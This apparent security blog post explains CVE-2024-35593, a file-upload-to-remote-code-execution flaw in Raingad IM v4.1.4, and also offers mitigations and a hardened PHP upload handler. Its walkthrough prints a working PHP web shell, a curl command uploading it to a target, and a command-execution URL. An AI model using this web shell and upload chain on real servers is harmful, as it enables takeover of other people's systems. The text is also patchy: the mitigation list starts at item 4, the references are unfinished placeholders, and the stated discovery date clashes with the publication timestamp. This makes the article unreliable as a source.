In June 2024, a critical vulnerability surfaced in Raingad IM v4.1.4—an enterprise messaging system known for its file sharing and preview features. Tracked as CVE-2024-35593, this security flaw exposes servers to remote code execution attacks through a simple PDF upload.
This article breaks down the vulnerability in plain English, demonstrates the exploit, and provides mitigation tips. If you run Raingad IM, read on—your system may be exposed right now.
What is CVE-2024-35593?
CVE-2024-35593 is an arbitrary file upload vulnerability in the File Preview function of Raingad IM v4.1.4. This feature is meant to let users view documents—like PDFs—inside the chat app. But due to poor validation and improper handling of uploaded files, attackers can sneak in malicious files disguised as PDFs.
When a user uploads a PDF, Raingad IM saves it in a public directory and sometimes tries to process it (for preview). If the “PDF” is actually a web shell or executable script, that code can run on the server. In short: upload one crafty PDF and get full control.
Exploit Walkthrough: Step By Step
Let's see how an attacker could abuse this, with code snippets and real-life steps.
1. Crafting a Malicious “PDF”
A PDF file starts with %PDF. But Raingad IM only checks file extensions, not the actual content. So, a hacker can upload a script (e.g., PHP) and name it “evil.pdf”.
Suppose the server supports PHP and allows the file to be accessed in the /uploads folder.
Example: Preparing the Web Shell
<?php
// shell.pdf (but actually PHP)
if (isset($_REQUEST['cmd'])) {
    echo "<pre>" . shell_exec($_REQUEST['cmd']) . "</pre>";
}
?>
Next, hit the “File Preview” upload endpoint. For Raingad IM, say it is:
POST /file/preview/upload
Using curl:
curl -F "file=@shell.pdf" http://target-victim.com/file/preview/upload
The server saves this file without validating whether the content matches the extension.
If the upload path is public (say /uploads/preview/), open:
http://target-victim.com/uploads/preview/shell.pdf?cmd=whoami
Developers might have code like this in their backend:
<?php
// CVE-2024-35593: Vulnerability Example
$upload_dir = '/var/www/raingad/uploads/preview/';
$file = $_FILES['file'];
$filename = basename($file['name']);
// Only checks extension, not content!
// The client-supplied name is also reused verbatim, and the directory is inside the web root.
if (strtolower(pathinfo($filename, PATHINFO_EXTENSION)) == 'pdf') {
    move_uploaded_file($file['tmp_name'], $upload_dir . $filename);
    echo "File uploaded!";
} else {
    echo "File type not allowed.";
}
No content check, no sanitization = Remote Code Execution!
Original References
- CVE-2024-35593 Record (MITRE)
- Raingad IM project *(official repo)*
- VulDB advisory *(add link when available)*
- Proof-of-Concept write-up *(exploit-db, coming soon)*
Move uploads outside of web root: Prevent public access to uploads.
4. Block script execution in uploads: Ensure your web server does not execute scripts (.php, .asp, etc.) in user-uploadable directories.
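A hardened replacement for the extension-only handler shown above, written here as an added example (not Raingad IM's own code). It assumes PHP with the fileinfo extension and a storage path outside the web root; the path and size limit are placeholders.

```php
<?php
// Hardened upload handler (added example, not Raingad IM's own code).
// Assumptions: PHP with the fileinfo extension, and a storage path outside the web root.
declare(strict_types=1);

const UPLOAD_DIR = '/var/lib/raingad/previews/';  // assumed path, not served by the web server
const MAX_BYTES  = 20 * 1024 * 1024;              // assumed size limit
// True only if extension, magic bytes and libmagic's MIME type all say "PDF".
function is_real_pdf(string $tmpPath, string $originalName): bool
{
    if (strtolower(pathinfo($originalName, PATHINFO_EXTENSION)) !== 'pdf') {
        return false;
    }
    $fh = fopen($tmpPath, 'rb');
    if ($fh === false) {
        return false;
    }
    $head = fread($fh, 5);  // every PDF begins with the header "%PDF-"
    fclose($fh);
    if ($head !== '%PDF-') {
        return false;
    }
    $finfo = new finfo(FILEINFO_MIME_TYPE);  // sniffs content, ignores the client's name
    return $finfo->file($tmpPath) === 'application/pdf';
}

function handle_upload(array $file): string
{
    if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK
        || !is_uploaded_file($file['tmp_name'])) {
        return 'Upload failed.';
    }
    if ($file['size'] > MAX_BYTES) {
        return 'File too large.';
    }
    if (!is_real_pdf($file['tmp_name'], $file['name'])) {
        return 'File type not allowed.';
    }
    // Never reuse the client-supplied name: random name with a fixed .pdf extension,
    // so double extensions and path separators in the original name never reach the disk.
    $stored = bin2hex(random_bytes(16)) . '.pdf';
    if (!move_uploaded_file($file['tmp_name'], UPLOAD_DIR . $stored)) {
        return 'Upload failed.';
    }
    // Previews are served later by a script that streams the file with
    // Content-Type: application/pdf, never by a direct URL into UPLOAD_DIR.
    return 'File uploaded as ' . $stored;
}
echo handle_upload($_FILES['file'] ?? []);
```

Content checks alone do not stop a polyglot file that is both a valid PDF and a script, which is why keeping uploads outside the web root and blocking script execution in upload directories still matter.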
Conclusion
CVE-2024-35593 is a classic, dangerous "file upload to RCE" bug caused by a trusting File Preview feature. All an attacker needs is a “PDF” with a script inside. If your infrastructure runs Raingad IM v4.1.4 (or earlier), patch now, review your file upload logic, and lock down your server.
Don't let the pretty face of a PDF be a backdoor into your network!
---
*This post is an exclusive, simplified breakdown for the English-speaking infosec community. Stay safe, patch often, and never trust user uploads!*
Timeline
Published on: 05/24/2024 14:15:17 UTC
Last modified on: 10/30/2024 08:35:03 UTC